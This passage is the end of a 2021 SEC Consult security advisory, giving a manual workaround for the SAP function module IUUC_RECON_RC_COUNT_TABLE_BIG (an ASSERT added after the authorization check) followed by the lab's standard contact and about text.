Please refer to the section workaround. Workaround: ----------- In lower SP levels, the correction can be applied manually by modifying function module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement directly after the authorization check: ASSERT it_where_clause[] IS INITIAL. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Raschin Tavakoli / @2021 </code></pre>